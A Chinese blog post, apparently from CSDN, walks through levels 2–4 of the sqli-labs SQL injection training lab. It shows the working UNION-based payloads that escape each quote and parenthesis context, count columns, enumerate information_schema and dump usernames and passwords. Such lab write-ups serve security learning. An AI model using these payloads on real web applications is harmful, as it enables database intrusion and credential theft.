sql注入sqli-labs第二-四关

最新推荐文章于 2024-08-08 14:37:33 发布
最新推荐文章于 2024-08-08 14:37:33 发布
阅读量657 收藏 17
点赞数 17
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixiaoge/article/details/140935506
版权

目录

sql注入sqli-labs第二关

1、了解表的列数

 2、连表查询

3、注入管理员账号密码

sql注入sqli-labs第三关

1、逃脱单引号,括号

​编辑

2、了解表的列数

3、连表查询

4、注入管理员账号密码

sql注入sqli-labs第四关

 1、逃脱双引号,括号

 2、了解表的列数

 3、连表查询

 4、注入管理员账号密码

sql注入sqli-labs第二关

首先按照第一题进行尝试,再用双引号进行尝试

根据报错信息可以看出并非像第一天一样是字符型注入

可以猜测代码:id=$id的形式

那么和第一关思路相同,都不用引号逃脱了

        1、了解表的列数

        2、连表查询

        3、注入管理员账号密码

1、了解表的列数

id=1 order by 3

id=1 order by 4

可以得到了表的列数

 2、连表查询

id=-1 union select 1,2,3

id=-1 union select 1,user(),database()

3、注入管理员账号密码

id=-1 union select 1,2,group_concat(table_name) from information_schema.tables

id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

id=-1 union select 1,2,group_concat(username ,id , password) from users

sql注入sqli-labs第三关

同样用单引号看看报错信息

可以看出代码类似id=('id')

所有在逃脱单引号的同时好要注意括号

        1、逃脱单引号,括号

        2、了解表的列数

        3、连表查询

        4、注入管理员账号密码

1、逃脱单引号,括号

id=1')%23

2、了解表的列数

id=1') group by 3%23

id=1') group by 4%23

3、连表查询

id=-1') union select 1,2,3%23

id=-1') union select 1,user(),database()%23

4、注入管理员账号密码

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

id=-1') union select 1,2,group_concat(username ,id , password) from users%23

sql注入sqli-labs第四关

使用双引号尝试,分析报错

尝试id=1")%24  可以知道代码类似id=("id")

        1、逃脱双引号,括号

        2、了解表的列数

        3、连表查询

        4、注入管理员账号密码

 1、逃脱双引号,括号

id=1")%24

 2、了解表的列数

?id=1") order by 3%23
 

 3、连表查询

?id=-1") union select 1,2,3%23

?id=-1") union select 1,database(),version()%23

 4、注入管理员账号密码

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

?id=-1") union select 1,2,group_concat(username ,id , password) from users%23

nixiaoge
关注
  • 17
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2242
sqli第三关简要步骤
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 621
sql注入基础操作及相关sqli-labs关卡通关流程
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
SQL注入——sqli-labs第二四关
lizhiiiii的博客
02-01 596
这一关我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQL注入Sqli-labs第二
走马
11-06 598
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二关。
SQL注入sqli-labs
m0_60716947的博客
04-08 7377
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
SQL注入——sqli-labs第五关
lizhiiiii的博客
01-29 619
使用floor报错语句注入
sql二次注入-sqli-labs第13关
weixin_46784800的博客
11-04 953
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
#### 第二关:数字型注入 此关涉及对数字类型的注入点进行攻击,主要步骤包括: 1. **访问靶场**: - 访问地址:`http://sql-lasb-master:8088/Less-2/` - 注入尝试:`...
详细sqli-labs(1-20)通关讲解
05-18
#### 第二关:数字型 SQL 注入 本关重点在于学习如何利用数字型 SQL 注入漏洞获取敏感信息。 **实验步骤** 1. **判断表列数**: - 输入:`?id=1') ORDER BY 4--+` - 观察反馈,确定表列数。 2. **确定显示列**...
2020-10-23-sqli-labs.md
01-24
本例中回显位置为第2和第3个字段。 - **查询数据库信息**: - **数据库名称**:`id=-1' union select 1,database(),3 --+` - **表名**:`id=-1' union select 1,(select group_concat(table_name) from ...
SQLI-labs-第二四关
weixin_54055099的博客
05-24 417
Sqli-labs第24关,二次注入
kubernetes集群部署sql server数据库服务
最新发布
jiang0615csdn的博客
08-08 456
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 255
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
QSqlQueryModel与QSqlTableModel查询数据库
weixin_39688581的博客
08-08 203
项目中需要对数据进行查询与展示,数据量不大,使用的是sqlite数据库,将使用过程记录如下。
postgreSQL16添加审计功能
ciqingloveless的博客
08-07 210
他的分支版本支持不同的PGSQL按需下载。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值